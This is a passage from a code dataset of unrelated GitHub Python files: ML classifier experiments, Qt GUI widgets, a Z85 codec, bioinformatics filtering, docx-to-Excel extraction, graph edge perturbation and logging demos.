test_targ)\r\n #kneigh_invalid = classifier.find_invalid_files(kneigh_ans, test_targ, test_file_list)\r\n\r\n #dec_tree_ans = classifier.decision_tree(train_feat, train_targ, test_feat, test_targ) #Default value: -999 -->0.825307 default value: 0 --> 0.83426651, removing invalid --> 0.8290406, default value of -12345 --> 0.8253079, default value: 1 --> 0.83501306\r\n #dec_tree_invalid = classifier.find_invalid_files(dec_tree_ans, test_targ, test_file_list)\r\n\r\n #random_forest_ans = classifier.random_forest(train_feat, train_targ, test_feat, test_targ)\r\n #random_forest_invalid = classifier.find_invalid_files(random_forest_ans, test_targ, test_file_list)\r\n\r\n #hist_ans = classifier.histogram_classifier(train_feat, train_targ, test_feat, test_targ)\r\n #classifier.organize_results(hist_ans, test_targ)\r\n #hist_invalid = classifier.find_invalid_files(hist_ans, test_targ, test_file_list)\r\n\r\n grad_ans = classifier.gradient_boost(train_feat, train_targ, test_feat, test_targ)\r\n classifier.organize_results(grad_ans, test_targ)\r\n print(\"for depth = 6\")\r\n #print(\"Results for 5h intervals\")\r\n #grad_invalid = classifier.find_invalid_files(grad_ans, test_targ, test_file_list)\r\n\r\n #invalid_list = [dec_tree_invalid, hist_invalid, random_forest_invalid, kneigh_invalid, grad_invalid]\r\n\r\n\r\n #classifier.find_common_invalid_feat(invalid_list)\r\n\r\n #ans = classifier.neaural_network(train_feat, train_targ, test_feat, test_targ)\r\n #kneighbours = classifier.k_neighbours(train_feat, train_targ, test_feat, test_targ)\r\n #classifier.organize_results(kneighbours, test_targ)\r\n #onevone = classifier.oneVsOne_classifier(train_feat, train_targ, test_feat, test_targ)\r\n #onevall = classifier.oneVsRest_classifier(train_feat, train_targ, test_feat, test_targ)\r\n\r\n #classifier.time_series_forest(train_feat, train_targ, test_feat, test_targ)\r\n\"\"\"\r\n grad1, s1 = classifier.gradient_boost(train_feat, train_targ, test_feat, test_targ, 0)\r\n grad2, s2 = classifier.gradient_boost(train_feat, train_targ, test_feat, test_targ, 1)\r\n grad3, s3 = classifier.gradient_boost(train_feat, train_targ, test_feat, test_targ, 2)\r\n grad4, s4 = classifier.gradient_boost(train_feat, train_targ, test_feat, test_targ, 3)\r\n grad5, s5 = classifier.gradient_boost(train_feat, train_targ, test_feat, test_targ, 4)\r\n\r\n eclf = VotingClassifier(estimators=[(\"grad1\", grad1), (\"grad2\", grad2), (\"grad3\", grad3), (\"grad4\", grad4), (\"grad5\", grad5)], verbose=10, voting=\"soft\")\r\n eclf = eclf.fit(train_feat, train_targ)\r\n print(f\"eclf score: {eclf.score(test_feat, test_targ)}\")\r\n\r\n print(f\"Individual scores: {[s1, s2, s3, s4, s5]}\")\r\n\r\n \"\"\"\r\n\r\n\r\n\r\n","repo_name":"HavardRMinsas/Tag_Inference","sub_path":"multiple_methods.py","file_name":"multiple_methods.py","file_ext":"py","file_size_in_byte":16888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"14146716536","text":"from PyQt4.QtGui import *\nfrom PyQt4.QtCore import *\nimport time\n\nclass birlesik(QDialog):\n def __init__(self, ebeveyn=None):\n super(birlesik, self).__init__(ebeveyn)\n\n grid = QGridLayout()\n surgu = QSlider()\n surgu.setRange(0, 100)\n surgu.setOrientation(Qt.Horizontal)\n grid.addWidget(surgu, 0, 0)\n\n dkutu = QSpinBox()\n dkutu.setRange(0, 100)\n grid.addWidget(dkutu, 1, 0)\n\n self.connect(surgu, SIGNAL('valueChanged(int)'), dkutu.setValue)\n self.connect(dkutu, SIGNAL('valueChanged(int)'), surgu.setValue)\n\n self.setLayout(grid)\n self.setWindowTitle('Nesneleri Birlestirme')\n\nuyg = QApplication([])\npencere = birlesik()\npencere.show()\nuyg.exec_()","repo_name":"yigitaltintas/PyQt","sub_path":"qt4birlestirme.py","file_name":"qt4birlestirme.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"34036022395","text":"import struct\n\nMAP_ENCODE = (\n b\"0123456789abcdefghijklmnopqrstuvwxyzABCDEFG\"\n b\"HIJKLMNOPQRSTUVWXYZ.-:+=^!/*?&<>()[]{}@%$#\"\n)\nMAP_DECODE = {c: idx for (idx, c) in enumerate(MAP_ENCODE)}\n\n\nclass Z85Exception(Exception):\n pass\n\n\ndef z85_decode(msg: bytes) -> bytes:\n if isinstance(msg, str):\n msg = msg.encode(\"ascii\")\n if len(msg) % 5 != 0:\n raise Z85Exception(\"message must be a multiple of 5 bytes\")\n buf = bytearray(len(msg) * 4 // 5)\n copy_to = 0\n idx = 0\n val = 0\n try:\n for char in msg:\n val += MAP_DECODE[char]\n idx += 1\n if idx == 5:\n copy_next = copy_to + 4\n buf[copy_to:copy_next] = val.to_bytes(4, \"big\")\n copy_to = copy_next\n idx = 0\n val = 0\n else:\n val *= 85\n except KeyError:\n raise Z85Exception(\"invalid input\")\n return bytes(buf)\n\n\ndef z85_encode(msg: bytes) -> bytes:\n if isinstance(msg, str):\n msg = msg.encode(\"ascii\")\n if len(msg) % 4 != 0:\n raise Z85Exception(\"message must be a multiple of 4 bytes\")\n buf = bytearray(len(msg) * 5 // 4)\n idx = 4\n for (val,) in struct.iter_unpack(\">L\", msg):\n for _ in range(4):\n buf[idx] = MAP_ENCODE[val % 85]\n idx -= 1\n val //= 85\n buf[idx] = MAP_ENCODE[val]\n idx += 9\n return bytes(buf)\n\n\nif __name__ == \"__main__\":\n assert z85_decode(\"HelloWorld\") == b\"\\x86\\x4F\\xD2\\x6F\\xB5\\x59\\xF7\\x5B\"\n assert z85_encode(b\"\\x86\\x4F\\xD2\\x6F\\xB5\\x59\\xF7\\x5B\") == b\"HelloWorld\"\n","repo_name":"andrewwhitehead/indy-zmq","sub_path":"indy_zmq/transport/z85.py","file_name":"z85.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"25755968303","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING, Dict\n\nfrom qtpy.QtWidgets import QMenu\n\nif TYPE_CHECKING:\n from qtpy.QtWidgets import QAction\n\n from ...layers._layer_actions import ActionOrSeparator\n\n\nclass QtActionContextMenu(QMenu):\n \"\"\"Makes a QMenu for a dict of `ContextActions`.\n\n `ContextActions` are just dicts with the following keys:\n description: str - the text for the menu item\n action: Callable - a callback when the item is selected\n enable_when: str - an expression that will be evaluated with the\n namespace of some context. If True, the menu item is enabled.\n show_when: str|None - an expression that will be evaluated with the\n namespace of some context. If True, the menu item is visible.\n If no show_when key is provided, the menu item is visible.\n\n Parameters\n ----------\n actions : Dict[str, ContextAction]\n An (ordered) mapping of name -> `ContextActions`. Menu items will be\n added in order of the keys in the mapping. To add a separator to the\n menu, add any key with a empty dict (or other falsy value). The key\n itself doesn't matter.\n parent : QWidget, optional\n Parent widget, by default None\n\n Examples\n --------\n\n Start with an actions dict to populate the menu:\n\n >>> ACTIONS = {\n ... 'add_one': {\n ... 'description': 'Add one',\n ... 'action': lambda x: x.append(1),\n ... 'enable_when': 'count == 0 and is_ready',\n ... },\n ... }\n >>> menu = QtActionContextMenu(ACTIONS)\n\n call menu.update_from_context to update the menu state:\n\n >>> menu.update_from_context({'count': 0, 'is_ready': True})\n >>> menu._menu_actions['add_one'].isEnabled()\n True\n\n We directly created the dict above, but a mapping of\n {key -> callable(obj)} is a good way to (re)create context\n dicts for an object that changes over time, like `my_list`:\n\n >>> my_list = [42]\n >>> CONTEXT_KEYS = {\n ... 'count': lambda x: len(x),\n ... 'is_ready': lambda x: True,\n ... }\n >>> ctx = {k: v(my_list) for k, v in CONTEXT_KEYS.items()}\n >>> ctx\n {'count': 1, 'is_ready': True}\n\n Use the context dict to update the menu. Here, because count != 0,\n `add_one` becomes disabled\n\n >>> menu.update_from_context(ctx)\n >>> menu._menu_actions['add_one'].isEnabled()\n False\n \"\"\"\n\n def __init__(self, actions: Dict[str, ActionOrSeparator], parent=None):\n super().__init__(parent)\n self._actions = actions\n self._menu_actions: Dict[str, QAction] = {}\n\n for name, d in actions.items():\n if not d:\n self.addSeparator()\n else:\n self._menu_actions[name] = self.addAction(d['description'])\n self._menu_actions[name].setData(d['action'])\n\n def update_from_context(self, ctx: dict) -> None:\n \"\"\"Update the enabled/visible state of each menu item with `ctx`.\n\n `ctx` is a namepsace dict that will be used to `eval()` the\n `'enable_when'` and `'show_when'` expressions provided for each action\n in the menu. *ALL variables used in these expressions must either be\n present in the `ctx` dict, or be builtins*.\n \"\"\"\n for name, menu_item in self._menu_actions.items():\n d = self._actions[name]\n enabled = eval(d['enable_when'], {}, ctx)\n menu_item.setEnabled(enabled)\n visible = d.get(\"show_when\")\n if visible:\n menu_item.setVisible(eval(visible, {}, ctx))\n","repo_name":"AbigailMcGovern/napari","sub_path":"napari/_qt/widgets/qt_action_context_menu.py","file_name":"qt_action_context_menu.py","file_ext":"py","file_size_in_byte":3629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"47"} +{"seq_id":"17751066443","text":"#!/usr/bin/env python\nimport os\nimport sys\n\nusage = '\\t --------\\n' \\\n '\\t| usage : python discard_5prime_consensus_reads file_1\\n' \\\n '\\t| input : file_1 = blastn_vs_5prime_consensus.tsv\\n' \\\n '\\t| output : a file containing read names to discard\\n' \\\n '\\t --------'\n\nif len(sys.argv) != 2:\n print(usage)\n sys.exit()\n\nquery_dic = {}\nwith open(sys.argv[1], 'r') as tsv:\n for row in tsv:\n columns = row.split('\\t')\n qseqid, length, qstart, qend, sstart, send, qlen, sstrand = columns[0], int(columns[3]), int(\n columns[6]), int(columns[7]), int(columns[8]), int(columns[9]), int(columns[12]), columns[14].rstrip()\n if not qseqid in query_dic:\n if length >= 25:\n if sstrand == 'plus':\n five_prime_overhead = (qstart - 1) - (sstart - 1) - 67\n three_prime_overhead = (qlen - qend) - (93 - send)\n elif sstrand == 'minus':\n five_prime_overhead = (qlen - qend) - (send - 1) - 67\n three_prime_overhead = (qstart - 1) - (93 - sstart)\n else:\n print('------------ERROR------------')\n if five_prime_overhead >= 50 or three_prime_overhead >= 50:\n query_dic[qseqid] = 'keep'\n else:\n query_dic[qseqid] = 'discard'\n\nfile = sys.argv[1].split('/')\nsample = file[-1].split('.')[0]\n\nwith open(sample + '.discard', 'a') as out:\n for k, v in query_dic.items():\n if v == 'discard':\n out.write(k + \"\\n\")\n","repo_name":"ScaonE/TTV","sub_path":"discard_5prime_consensus_reads.py","file_name":"discard_5prime_consensus_reads.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"31926874026","text":"# coding=utf-8\nfrom win32com import client as wc\nfrom docx import Document\nimport xlwt\nimport re\nimport os\n\n\ndef docx_to_dict(path):\n print(\"提取文档中景区信息...{}\".format(path))\n document = Document(path)\n l = [paragraph.text for paragraph in document.paragraphs]\n\n scenic = {\n 'name': '',\n 'level': '',\n 'pinyin': '',\n 'spelling': '',\n 'date': '',\n 'tel': '',\n 'country': '',\n 'province': '',\n 'city': '',\n 'region': '',\n 'address': '',\n 'intro': '',\n 'spot': []\n }\n\n # ---------------------------------pattern-------------------------------------------\n name_pat = re.compile(r'(.*?)(.*?字?数?.*?)')\n level_pat = re.compile(r'(.*?)级?景[点区]|([无未][等评]级)|(\\dA)级')\n pinyin_pat = re.compile(r'^\\s*([a-zA-Z]+)\\s*')\n date_pat = re.compile(r'(开放时间|夏季|旺季):?\\s*(.*)')\n tel_pat = re.compile(r'(电话|方式):?\\s*(.*)')\n addr_pat = re.compile(r'地址:\\s*(.*)')\n none_pat = re.compile(r'^$')\n # spot_name_pat = re.compile(r'【\\d\\d\\s*(.*?)】')\n spot_name_pat = re.compile(r'【\\d\\d\\s*(.*?)】.*?\\n', re.S)\n end_pat = re.compile(r'【?以下.*?[录配]音\\s*】?|【交通建议】')\n\n # ------------------------------Pre-treatment----------------------------------------\n content = ''\n for phr in l:\n phr = phr.replace(':', ':').replace('(', '(').replace(')', ')')\n if phr:\n content += '\\n' + phr\n spot_start = 0\n spot_end = 0\n try:\n spot_start = spot_name_pat.search(content).regs[0][0]\n spot_end = end_pat.search(content).regs[0][0] - 1\n\n except Exception:\n print(\"文件预处理出错\\t{0}\".format(path))\n main_info = content[:spot_start - 1]\n spot_info = content[spot_start:spot_end]\n # ------------------------------------------- main-info-----------------------------------------------\n for phr in main_info.split('\\n'):\n if not phr:\n continue\n if name_pat.findall(phr):\n scenic['name'] = name_pat.findall(phr)[0]\n name_pat = none_pat\n elif level_pat.findall(phr):\n scenic['level'] = level_pat.findall(phr)[0]\n scenic['level'] = ''.join(scenic['level'])\n level_pat = none_pat\n elif pinyin_pat.findall(phr): # 根据长短进行简拼和全拼判断\n if not scenic['pinyin']:\n scenic['pinyin'] = pinyin_pat.findall(phr)[0]\n else:\n scenic['spelling'] = pinyin_pat.findall(phr)[0]\n if len(scenic['pinyin']) < len(scenic['spelling']):\n scenic['pinyin'], scenic['spelling'] = scenic['spelling'], scenic['pinyin']\n\n elif date_pat.findall(phr):\n scenic['date'] = date_pat.findall(phr)[0][1]\n date_pat = none_pat\n elif tel_pat.findall(phr):\n scenic['tel'] = tel_pat.findall(phr)[0][1]\n tel_pat = none_pat\n elif addr_pat.findall(phr):\n scenic['address'] = addr_pat.findall(phr)[0]\n addr_pat = none_pat\n else:\n print(\"未找到合适匹配\\t{1}\\t{0})\".format(path, phr.split()))\n\n # ------------------------------------------- spot-info-----------------------------------------------\n spot_names = spot_name_pat.split(spot_info)\n spot_names.pop(0)\n spot_names.pop(0)\n\n scenic['intro'] = spot_names.pop(0)\n while spot_names:\n scenic['spot'].append({'name': spot_names.pop(0), 'desc': spot_names.pop(0)})\n\n return scenic\n\n\ndef doc_to_docx(src, des):\n print(\"进行doc->docx文件格式转换...{}\".format(src))\n word = wc.Dispatch('Word.Application')\n doc = word.Documents.Open(src) # 目标路径下的文件\n doc.SaveAs(des, 16) # 转化后路径下的文件\n doc.Close()\n word.Quit()\n return des\n\n\ndef dict_to_excel(info):\n workbook = xlwt.Workbook(encoding='ascii')\n worksheet = workbook.add_sheet('scenic')\n worksheet.write(0, 0, label='Row 0, Column 0 Value')\n workbook.save('Excel_Workbook.xls')\n\n\ndef main():\n docx_files = []\n for root, dirs, files in os.walk(r'E:\\Github\\python\\data\\5.28文稿'):\n for name in files:\n suffix = os.path.splitext(name)[1]\n if suffix == '.docx' and '$' not in name:\n docx_files.append(os.path.join(root, name))\n if suffix == '.doc' and '$' not in name:\n doc_path = os.path.join(root, name)\n des = 'E:/Github/python/data/convert_docx/' + name.replace('.doc', '.docx')\n try:\n docx_path = doc_to_docx(doc_path.replace('\\\\', '/'), des)\n docx_files.append(docx_path)\n except Exception:\n print(\"格式转换(doc-docx)出错\\t{0}\".format(doc_path))\n\n workbook = xlwt.Workbook(encoding='ascii')\n worksheet = workbook.add_sheet('scenic')\n worksheet.write(0, 0, label='景区名称')\n worksheet.write(0, 1, label='景区级别')\n worksheet.write(0, 2, label='全拼')\n worksheet.write(0, 3, label='简拼')\n worksheet.write(0, 4, label='开放时间')\n worksheet.write(0, 5, label='联系电话')\n worksheet.write(0, 6, label='国家')\n worksheet.write(0, 7, label='省')\n worksheet.write(0, 8, label='市')\n worksheet.write(0, 9, label='区')\n worksheet.write(0, 10, label='地址')\n worksheet.write(0, 11, label='景区文本')\n\n for row, file in enumerate(docx_files):\n scenic_info = docx_to_dict(file)\n column = 0\n for key, value in scenic_info.items():\n if key != 'spot':\n worksheet.write(row + 1, column, label=value)\n column += 1\n\n else:\n for column2, spot in enumerate(value):\n try:\n\n worksheet.write(0, column + column2 * 2, label='景点' + str(column2 + 1) + '名称')\n worksheet.write(0, column + column2 * 2 + 1, label='景点' + str(column2 + 1) + '简介')\n except Exception:\n pass\n worksheet.write(row + 1, column + column2 * 2, label=spot['name'])\n worksheet.write(row + 1, column + column2 * 2 + 1, label=spot['desc'])\n\n workbook.save('Excel_Workbook.xls')\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Andychu525/python","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":6419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"24656522405","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Dec 12 09:29:04 2019\r\n\r\n@author: Jackson\r\n\"\"\"\r\nimport sys\r\nimport networkx as nx\r\nfrom collections import defaultdict\r\nimport networkx as nx\r\nimport matplotlib.pyplot as plt\r\n\r\ndef remove_percent_edges(G, percent):\r\n iterations = int((percent / 100) * len(list(G.edges)))\r\n #print('iterations: ', iterations) \r\n for x in range(iterations):\r\n upper_bound = len(list(G.edges)) - 1\r\n randIndex = random.randint(0, upper_bound)\r\n edges = list(G.edges)\r\n #print('rand index: ', randIndex)\r\n #print('removing: ', *edges[randIndex])\r\n G.remove_edge(*edges[randIndex])\r\n \r\ndef add_percent_edges(G, percent):\r\n print('Total edge count start: ', len(list(G.edges)))\r\n iterations = int((percent / 100) * len(list(G.edges)))\r\n for x in range(iterations):\r\n edges = sorted(list(G.edges))\r\n non_edges = list(nx.non_edges(G))\r\n chosen_non_edge = random.choice(non_edges)\r\n print('Chosen edge to add: ', chosen_non_edge)\r\n print('List of current edges: ', edges)\r\n G.add_edge(*chosen_non_edge)\r\n \r\n print('Total edge count end: ', len(list(G.edges)))\r\n\r\nfor x in range(10):\r\n G = nx.read_graphml('hiv.graphml')\r\n remove_percent_edges(G, 1)\r\n nx.write_graphml_lxml(G, \"graphs/hiv-remove-1-\"+str(x+1)+\".graphml\")\r\n\r\nfor x in range(10):\r\n G = nx.read_graphml('hiv.graphml')\r\n remove_percent_edges(G, 5)\r\n nx.write_graphml_lxml(G, \"graphs/hiv-remove-5-\"+str(x+1)+\".graphml\")\r\n \r\nfor x in range(10):\r\n G = nx.read_graphml('hiv.graphml')\r\n remove_percent_edges(G, 10)\r\n nx.write_graphml_lxml(G, \"graphs/hiv-remove-10-\"+str(x+1)+\".graphml\")\r\n \r\nfor x in range(10):\r\n G = nx.read_graphml('hiv.graphml')\r\n remove_percent_edges(G, 1)\r\n nx.write_graphml_lxml(G, \"graphs/hiv-add-1-\"+str(x+1)+\".graphml\")\r\n\r\nfor x in range(10):\r\n G = nx.read_graphml('hiv.graphml')\r\n remove_percent_edges(G, 5)\r\n nx.write_graphml_lxml(G, \"graphs/hiv-add-5-\"+str(x+1)+\".graphml\")\r\n \r\nfor x in range(10):\r\n G = nx.read_graphml('hiv.graphml')\r\n remove_percent_edges(G, 10)\r\n nx.write_graphml_lxml(G, \"graphs/hiv-add-10-\"+str(x+1)+\".graphml\")","repo_name":"BatesJackson/COSC448_Final_Project","sub_path":"COSC448/Add_Remove_Edges.py","file_name":"Add_Remove_Edges.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"12092428090","text":"import numpy as np\nfrom sklearn.covariance import EllipticEnvelope\nfrom sklearn.datasets import make_blobs\n\nfeatures, _ = make_blobs(n_samples=10,\n n_features=2,\n centers=1,\n random_state=1)\n\n# Заменить значение первого наблюдения предельными значениями\nfeatures[0, 0] = 10000\nfeatures[0, 1] = 10000\n\n# Создать детектор\noutlier_detector = EllipticEnvelope(contamination=.1)\n\noutlier_detector.fit(features)\n\n# Предсказать выбросы\nprint(outlier_detector.predict(features))\n\n# Основным ограничением этого подхода является необходимость указания параметра загрязнения contamination,\n# который представляет собой долю наблюдений, являющихся выбросами, — значение, которое мы не знаем\n\n# Если мы ожидаем, что наши данные будут иметь несколько выбросов, мы можем задать параметр contamination с\n# каким-нибудь небольшим значением. Однако, если мы считаем, что данные, скорее всего, будут иметь выбросы,\n# мы можем установить для него более высокое значение.\n\n# Вместо того чтобы смотреть на наблюдения в целом, мы можем взглянуть на\n# отдельные признаки и идентифицировать в этих признаках предельные значения,\n# используя межквартильный размах (МКР, IQR):\n\nfeature = features[:, 0]\n\n\ndef indicies_of_outliers(x):\n q1, q3 = np.percentile(x, [25, 75])\n iqr = q3 - q1\n lower_bound = q1 - (iqr * 1.5)\n upper_bound = q3 + (iqr * 1.5)\n return np.where((x > upper_bound) | (x < lower_bound))\n\n\nprint(indicies_of_outliers(feature))\n","repo_name":"nikneural/MLRecipe4","sub_path":"Обнаружение выбросов.py","file_name":"Обнаружение выбросов.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"26560776015","text":"import logging\n\nfmt_str = '%(asctime)s:%(name)s:%(levelname)s:%(process)s:%(filename)s:%(message)s'\n\nlogging.basicConfig(level=logging.DEBUG, format=fmt_str, filename='error.log')\nlogging.debug('debug message')\n\nlogging.info('confirmation note')\nlogging.warning('warning message')\nlogging.error('an error note')\nlogging.critical('panic error')","repo_name":"ravijaya/june-22","sub_path":"demologs/pslog1.py","file_name":"pslog1.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"37392359599","text":"import os.path\nfrom typing import Union\n\nfrom PySide6 import QtWidgets, QtCore, QtGui\n\nimport modules.DragDropLineEdit\nfrom ui_files.BaseUI import Ui_base_args_ui\nfrom modules.CollapsibleWidget import CollapsibleWidget\n\n\nclass BaseArgsWidget(QtWidgets.QWidget):\n CacheLatentsChecked = QtCore.Signal(bool)\n\n def __init__(self, parent: QtWidgets.QWidget = None) -> None:\n super(BaseArgsWidget, self).__init__(parent)\n self.args = {\"pretrained_model_name_or_path\": \"\", \"mixed_precision\": \"fp16\", \"seed\": 23, \"clip_skip\": 2,\n \"xformers\": True, \"max_train_epochs\": 1, \"max_data_loader_n_workers\": 1,\n \"persistent_data_loader_workers\": True, \"max_token_length\": 225, \"prior_loss_weight\": 1.0}\n self.dataset_args = {\"resolution\": 512, \"batch_size\": 1}\n self.name = \"general_args\"\n self.setLayout(QtWidgets.QVBoxLayout())\n self.colap = CollapsibleWidget(self, \"General Args\")\n self.layout().addWidget(self.colap)\n self.layout().setContentsMargins(9, 0, 9, 0)\n self.content = QtWidgets.QWidget()\n self.colap.add_widget(self.content, \"main_widget\")\n\n self.widget = Ui_base_args_ui()\n self.widget.setupUi(self.content)\n self.widget.base_model_input.highlight = True\n self.widget.base_model_input.setMode(\"file\", ['.ckpt', '.pt', '.safetensors'])\n self.widget.base_model_selector.setIcon(QtGui.QIcon(os.path.join(\"icons\", \"more-horizontal.svg\")))\n\n # Base Model connections\n self.widget.base_model_input.textChanged.connect(lambda x: self.edit_args(\"pretrained_model_name_or_path\", x,\n elem=self.widget.base_model_input))\n self.widget.base_model_selector.clicked.connect(self.set_from_dialog)\n self.widget.v2_enable.clicked.connect(self.enable_disable_sd2)\n self.widget.v_param_enable.clicked.connect(lambda x: self.enable_disable_sd2(self.widget.v2_enable.isChecked()))\n self.widget.v_pred_enable.clicked.connect(lambda x: self.edit_args(\"scale_v_pred_loss_like_noise_pred\", x, True))\n\n # resolution connections\n self.widget.width_input.valueChanged.connect(lambda x: self.change_resolution(True, x))\n self.widget.height_input.valueChanged.connect(lambda x: self.change_resolution(False, x))\n self.widget.height_enable.clicked.connect(self.enable_disable_height)\n\n # gradient connections\n self.widget.gradient_box.clicked.connect(self.enable_disable_gradient)\n self.widget.gradient_selector.currentIndexChanged.connect(lambda x: self.enable_disable_gradient(True))\n self.widget.gradient_steps_input.valueChanged.connect(\n lambda x: self.edit_args(\"gradient_accumulation_steps\", x))\n\n # max training time connections\n self.widget.max_train_selector.currentIndexChanged.connect(self.max_training_select)\n self.widget.max_train_input.valueChanged.connect(\n lambda x: self.max_training_select(self.widget.max_train_selector.currentIndex()))\n\n # cache latents connections\n self.widget.cache_latents_enable.clicked.connect(self.enable_cache_latents)\n self.widget.cache_latents_to_disk_enable.clicked.connect(lambda x: self.enable_cache_latents(True))\n\n # Comment in Metadata\n self.widget.comment_enable.clicked.connect(self.enable_disable_comment)\n self.widget.comment_input.textChanged.connect(lambda: self.edit_args(\n \"training_comment\", self.widget.comment_input.toPlainText(), True))\n\n # generic connections\n self.widget.seed_input.valueChanged.connect(lambda x: self.edit_args(\"seed\", x))\n self.widget.clip_skip_input.valueChanged.connect(lambda x: self.edit_args(\"clip_skip\", x))\n self.widget.loss_weight_input.valueChanged.connect(lambda x: self.edit_args(\"prior_loss_weight\",\n round(x, 2)))\n self.widget.xformers_enable.clicked.connect(self.enable_disable_xformers)\n self.widget.batch_size_input.valueChanged.connect(lambda x: self.edit_dataset_args(\"batch_size\", x))\n self.widget.max_token_selector.currentIndexChanged.connect(self.edit_token_length)\n self.widget.mixed_precision_selector.currentTextChanged.connect(lambda x: self.edit_args(\n \"mixed_precision\", x if x != \"float\" else \"no\"))\n\n @QtCore.Slot(str, object, bool, QtWidgets.QWidget)\n def edit_args(self, name: str, value: object, optional: bool = False, elem: QtWidgets.QWidget = None) -> None:\n if elem and isinstance(elem, modules.DragDropLineEdit.DragDropLineEdit):\n elem.update_stylesheet()\n if not optional:\n self.args[name] = value\n return\n if not value:\n if name in self.args:\n del self.args[name]\n return\n self.args[name] = value\n\n @QtCore.Slot(str, object, bool)\n def edit_dataset_args(self, name: str, value: object, optional: bool = False) -> None:\n if not optional:\n self.dataset_args[name] = value\n return\n if not value:\n if name in self.dataset_args:\n del self.dataset_args[name]\n return\n self.dataset_args[name] = value\n\n @QtCore.Slot()\n def set_from_dialog(self) -> None:\n extensions = \" \".join([\"*\" + s for s in self.widget.base_model_input.extensions])\n default_folder = os.path.split(self.widget.base_model_input.text())[0] if \\\n os.path.exists(self.widget.base_model_input.text()) else \"\"\n file_name, _ = QtWidgets.QFileDialog.getOpenFileName(\n self, \"Open Model File\", dir=default_folder,\n filter=f\"Stable Diffusion Models ({extensions})\")\n self.widget.base_model_input.setText(file_name or self.widget.base_model_input.text())\n\n @QtCore.Slot(bool)\n def enable_disable_sd2(self, checked: bool) -> None:\n if checked:\n self.args['v2'] = True\n self.widget.v_param_enable.setEnabled(True)\n self.edit_args(\"v_parameterization\", self.widget.v_param_enable.isChecked(), True)\n if self.widget.v_param_enable.isChecked():\n self.widget.v_pred_enable.setEnabled(True)\n self.edit_args(\"scale_v_pred_loss_like_noise_pred\", self.widget.v_pred_enable.isChecked(), True)\n else:\n self.widget.v_pred_enable.setEnabled(False)\n self.edit_args(\"scale_v_pred_loss_like_noise_pred\", False, True)\n else:\n self.widget.v_param_enable.setEnabled(False)\n self.widget.v_pred_enable.setEnabled(False)\n for name in ['v2', 'v_parameterization', 'scale_v_pred_loss_like_noise_pred']:\n if name in self.args:\n del self.args[name]\n\n @QtCore.Slot(bool)\n def enable_disable_height(self, checked: bool) -> None:\n if checked:\n self.widget.height_input.setEnabled(True)\n self.dataset_args['resolution'] = [self.widget.width_input.value(), self.widget.height_input.value()]\n else:\n self.widget.height_input.setEnabled(False)\n self.dataset_args['resolution'] = self.widget.width_input.value()\n\n @QtCore.Slot(bool, int)\n def change_resolution(self, width: bool, value: int) -> None:\n if width:\n self.dataset_args['resolution'] = [value, self.widget.height_input.value()] if \\\n self.widget.height_input.isEnabled() else value\n else:\n self.dataset_args['resolution'] = [self.widget.width_input.value(), value]\n\n @QtCore.Slot(bool)\n def enable_disable_gradient(self, checked: bool) -> None:\n for name in ['gradient_checkpointing', 'gradient_accumulation_steps']:\n if name in self.args:\n del self.args[name]\n if checked:\n checkpointing = self.widget.gradient_selector.currentIndex() == 0\n if checkpointing:\n self.args['gradient_checkpointing'] = True\n self.widget.gradient_steps_input.setEnabled(False)\n else:\n self.args['gradient_accumulation_steps'] = self.widget.gradient_steps_input.value()\n self.widget.gradient_steps_input.setEnabled(True)\n\n @QtCore.Slot(bool)\n def enable_disable_comment(self, checked: bool) -> None:\n self.widget.comment_input.setEnabled(checked)\n self.edit_args(\"training_comment\", self.widget.comment_input.toPlainText() if checked else None, True)\n\n @QtCore.Slot(int)\n def max_training_select(self, index: int) -> None:\n for name in ['max_train_epochs', \"max_train_steps\"]:\n if name in self.args:\n del self.args[name]\n self.args[f'max_train_{\"epochs\" if index == 0 else \"steps\"}'] = self.widget.max_train_input.value()\n\n @QtCore.Slot(bool)\n def enable_cache_latents(self, checked: bool) -> None:\n for name in ['cache_latents', \"cache_latents_to_disk\"]:\n if name in self.args:\n del self.args[name]\n self.CacheLatentsChecked.emit(checked)\n if checked:\n self.args['cache_latents'] = True\n self.widget.cache_latents_to_disk_enable.setEnabled(True)\n if self.widget.cache_latents_to_disk_enable.isChecked():\n self.args['cache_latents_to_disk'] = True\n else:\n self.widget.cache_latents_to_disk_enable.setEnabled(False)\n\n @QtCore.Slot(bool)\n def enable_disable_xformers(self, checked: bool) -> None:\n if \"xformers\" in self.args:\n del self.args['xformers']\n if checked:\n self.args['xformers'] = True\n\n @QtCore.Slot(int)\n def edit_token_length(self, index: int) -> None:\n if \"max_token_length\" in self.dataset_args:\n del self.args['max_token_length']\n if index != 2:\n self.args['max_token_length'] = int(self.widget.max_token_selector.currentText())\n\n def get_args(self, input_args: dict) -> None:\n valid = self.widget.base_model_input.update_stylesheet()\n input_args['general_args'] = self.args if valid else None\n if not valid and self.colap.is_collapsed:\n self.colap.toggle_collapsed()\n self.colap.title_frame.update_arrow(False)\n self.colap.title_frame.setChecked(True)\n\n def get_dataset_args(self, input_args: dict) -> None:\n valid = self.widget.base_model_input.update_stylesheet()\n input_args['general_args'] = self.dataset_args if valid else None\n\n def load_args(self, args: dict) -> None:\n if self.name not in args:\n return\n args, dataset_args = args[self.name]['args'], 